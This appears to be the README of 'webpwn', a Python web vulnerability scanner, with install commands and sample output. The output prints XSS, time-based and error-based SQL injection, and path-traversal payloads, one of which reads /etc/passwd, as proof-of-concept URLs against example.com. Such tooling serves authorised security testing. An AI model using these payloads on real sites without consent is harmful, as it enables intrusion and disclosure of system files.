Web Vulnerability Scanner
Web Application Firewall (WAF) detection.
Cross Site Scripting (XSS) tests.
SQL injection time based test.
SQL injection error based test.
Local File Inclusion (LFI) test.
Cross Site Tracing (XST) test.
git clone https://github.com/farinap5/webpwn.git
cd webpwn
python3 webpwn.py http://example.com/page.php?cat=1
python3 webpwn.py http://example.com/page.php?cat=1
[*] No WAF Detected.
WebPwn
------
Target: http://example.com/page.php?cat=1
Server: nginx/1.19.0
Data: Mon, 07 Dec 2020 18:24:50 GMT
Powered: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
[!] Testing XSS
[!] 10 Payloads.
[+] 9 Payloads were found.
[*] Payload found!
[!] Payload: <script>alert("inject")</script>
[!] POC: http://example.com/page.php?cat=<script>alert("inject")</script>
[*] Payload found!
[!] Payload: %3Cscript%3Ealert%28%22inject%22%29%3C%2Fscript%3E
[!] POC: http://example.com/page.php?cat=%3Cscript%3Ealert%28%22inject%22%29%3C%2Fscript%3E
[!] Testing SQLi
[*] Blind SQL injection time based found!
[!] Payload: 1-SLEEP(2)
[!] POC: http://example.com/page.php?cat=1-SLEEP(2)
[*] SQL Error found.
[!] Payload: '
[!] POC: http://example.com/page.php?cat='
[!] Testing LFI
[*] Payload found!
[!] Payload: ../../../../etc/passwd
[!] POC: http://example.com/page.php?cat=../../../../etc/passwd
[!] Testing XST
[*] This site seems vulnerable to Cross Site Tracing (XST)!
Usage of the webpwn for attack targets without prior mutual consent is illegal.
It is the end user's responsability to obey all applicable local, state, federal and international laws.
Developer assume no liability and not responsible for any misuse or damage caused by this program.